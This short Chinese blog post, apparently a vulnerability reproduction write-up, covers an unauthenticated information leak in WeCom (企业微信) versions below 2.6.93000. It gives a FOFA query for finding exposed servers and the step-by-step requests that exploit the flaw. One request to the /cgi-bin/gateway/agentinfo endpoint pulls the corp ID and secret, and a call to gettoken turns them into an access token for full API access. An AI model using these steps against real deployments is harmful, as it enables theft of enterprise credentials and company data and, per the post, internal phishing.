2023企业微信0Day漏洞复现

发表于2023-08-31更新于2024-04-10

漏洞概述

漏洞编号:

漏洞信息:企业微信0day漏洞可以在/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取。

漏洞危害:

  1. 可导致企业微信全量数据被获取
  2. 存在使用企业微信轻应用对内发送钓鱼文件和链接等风险

影响版本:2.5.x、2.6.93000以下

漏洞复现

FOFA语法:app=”Tencent-企业微信”

  1. 获取id和secret

    1
    https://xx.xx.xx.xx:xx/cgi-bin/gateway/agentinfo

    image-20230831171652928

  2. 获取Access_token

    1
    https://xx.xx.xx.xx:xx/cgi-bin/gettoken?corpid=xxxxxxx&corpsecret=x-xxxxxxxx

    image-20230831172105470

  3. 调用接口

    https://developer.work.weixin.qq.com/document/path/90196